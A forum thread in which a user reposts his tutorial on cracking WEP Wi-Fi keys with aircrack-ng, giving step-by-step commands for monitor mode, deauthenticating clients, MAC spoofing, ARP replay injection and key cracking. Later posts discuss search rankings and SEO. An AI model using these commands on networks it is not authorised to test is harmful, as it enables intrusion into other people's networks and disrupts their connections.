Can't log in? Can't recover your password? Need help? Contact me via email: unverified@hotmail.com
 
Thread Rating:
  • 2 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5


[TUTORIAL]WEP Cracking with Packet Injection
07-01-2011, 02:16 PM
Post: #1

slbmeh Offline
PHP Expert


Posts: 209
Joined: Aug 2012
Reputation: 6
Currency: 0.00 NSP
[TUTORIAL]WEP Cracking with Packet Injection
I wrote and published this last night:

Quote:Set your wireless card into monitor mode.

You need to have a wireless card that supports monitor mode. Monitor mode allows you to listen to all packets instead of only packets intended for you. This is done by creating a virtual interface to act as a second wireless adapter using the same hardware. The tool to automate this is airmon-ng. Please substitute your wireless interface accordingly in the following steps.

Take the interface down:

Code:
# ifconfig wlan0 down

Bring the interface back up in monitor mode:

Code:
# airmon-ng start wlan0

Test injection capabilities:

Code:
# aireplay-ng -9 -e ESSID -a 00:11:22:33:44:55 mon0
  • -9 tells aireplay to test injection
  • -e is the ESSID of the AP
  • -a is the BSSID (MAC Address) of the AP
  • mon0 is my interface in monitor mode

Start grabbing IVs:

Code:
# airodump-ng --bssid 00:11:22:33:44:55 -w ESSID mon0
  • –bssid is the MAC Address of the AP
  • -w is the prefix for the capture files, I normally use the ESSID
That’s all you need to do for a passive attack. Now we’ll speed up the process.

Authenticate with the AP:

One of these will work better than the other depending on your scenario. Choose what works best for you.

Code:
# aireplay-ng -1 0 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0
Code:
# aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0
If neither of those work MAC filtering may be configured and you will need to spoof your MAC to an existing client. Then you can either move on to the next step masquerading while the client is still up, or sent a deauthenticate packet and try the previous again / wait for the client to reauthenticate and send ARP packets.

Code:
# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

Inject your packets:

Finally, you’re associated and not getting sent deauthentication packets. As long as you are associated the AP will respond to your packets. If you lose authentication just perform what you had to do in the previous step. Now we’re going to start repeating ARP packets.

Code:
# aireplay-ng -3 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0

Crack your data:

Once you get about 20,000 you can try to see if you can find the key. You can perform this step while still collecting IVs. First we’ll try to crack based on a 64-bit key. Replace ESSID with whatever you put for the -w parameter for airdump previously.

Code:
# aircrack-ng -n 64 ESSID*.cap
If that doesn’t work we’ll try for a 128-bit key.

Code:
# aircrack-ng ESSID*.cap

Conclusion
The process to break through WEP can be completly automated and done in a very short period of time. Make sure you secure your network with something more secure. At the time of this article I use WPA2 with a RADIUS backend.

Original Post

A few additional points that I didn't publish in my article...
  • If you can choose between the ieee80211 stack and the mac80211 stack for driver support go with the mac stack.
  • A card designed for monitor mode works best. The one in my laptop was ripped out of a wireless router.
  • Use more than one device if possible.

There are alternative crack algorithms you can have aircrack use. The default only works with ARP requests but is the fastest. The Korek method is the oldest but works with any data and requires a full packet. There is also a brute force method which always works, you just need to have a lot of time on your hands.

Other injection methods can be used when playing around with aireplay. Repeating broadcasts work best if you are up against MAC filtering. You don't have to associate if you are just relaying broadcast packets.

If you have access to a machine on the network or can wire your machine in you can speed up the ARP collection to grab the key by pinging a non-existent host.

It might take a while to get your first ARP request but they grow exponentially once you get injection started.

There are other ways to get the key which are useful if there is no network activity which I may write an article on here about later.

-- Hope this helps some of you.

07-05-2011, 06:18 AM
Post: #2

slbmeh Offline
PHP Expert


Posts: 209
Joined: Aug 2012
Reputation: 6
Currency: 0.00 NSP
RE: [TUTORIAL]WEP Cracking with Packet Injection
This is the 8th page on google for "WEP Cracking Packet Injection"... Can't seem to get the keyword density right for the OC to actually come up in a search...

07-05-2011, 06:32 AM
Post: #3

Coder-san Away
~|0o|~


Posts: 2,623
Joined: Aug 2012
Reputation: 0
Currency: 0.00 NSP
RE: [TUTORIAL]WEP Cracking with Packet Injection
(07-05-2011 06:18 AM)slbmeh Wrote:  This is the 8th page on google for "WEP Cracking Packet Injection"... Can't seem to get the keyword density right for the OC to actually come up in a search...

I see it in the 1st page, 7th place. Using exact same keywords without quotes.
[link=http://www.google.com/search?hl=en&client=firefox-a&hs=RLf&rls=org.mozilla%3Aen-US%3Aofficial&q=WEP+Cracking+Packet+Injection&aq=f&aqi=g-v1g-b1&aql=&oq=]WEP Cracking Packet Injection - Google Search - Mozilla Firefox[/link]
Or did you meant your blog's page?

Btw congrats on the domain Smile

[Image: rytwG00.png]
Redcat Revolution!
07-05-2011, 07:06 AM
Post: #4

slbmeh Offline
PHP Expert


Posts: 209
Joined: Aug 2012
Reputation: 6
Currency: 0.00 NSP
RE: [TUTORIAL]WEP Cracking with Packet Injection
(07-05-2011 06:32 AM)Coder-san Wrote:  
(07-05-2011 06:18 AM)slbmeh Wrote:  This is the 8th page on google for "WEP Cracking Packet Injection"... Can't seem to get the keyword density right for the OC to actually come up in a search...

I see it in the 1st page, 7th place. Using exact same keywords without quotes.
[link=http://www.google.com/search?hl=en&client=firefox-a&hs=RLf&rls=org.mozilla%3Aen-US%3Aofficial&q=WEP+Cracking+Packet+Injection&aq=f&aqi=g-v1g-b1&aql=&oq=]WEP Cracking Packet Injection - Google Search - Mozilla Firefox[/link]
Or did you meant your blog's page?

Btw congrats on the domain Smile

Oh ya, I meant 8th on the page... I wonder if the crawler hit the page between the time I posted and you posted and grabbed the keywords I put in the post.

Thanks for the congrats about the domain... I decided since I'm working on the SEO from the start... I might as well give all the good link juice to the real domain and not try to move it with 301s over time... Moving the host under the same domain is nothing compared to the SEO nightmare of changing domains...

That page is harder to target than say... slbmeh... because there are so many articles out there about it... I think I have a good saturation in the keyword density for that... long tailed keywords are easier to target... I think once I get a few good backlinks and a page rank I'll be set... these forums pretty much built my confidence up on that now that I'm talking about it and actually thinking instead of just being mad... The full article will get more hits on keywords in the article and in the meta... I just fixed my home page to show an excerpt instead of full article so I won't take a hit on duplicate content... So, in theory... once I get to the same PR level as HC I should sit above it in search engines...

Crazy thing on a side note about google... The crawler is hitting my entire site four times a day... My sitemaps must be structured well along with playing well with robots.txt... because it seems to like me...

Edit: Just updated all entries to include the <acronym> tag to get more keyword hits...



Thread Options


User(s) browsing this thread: 1 Guest(s)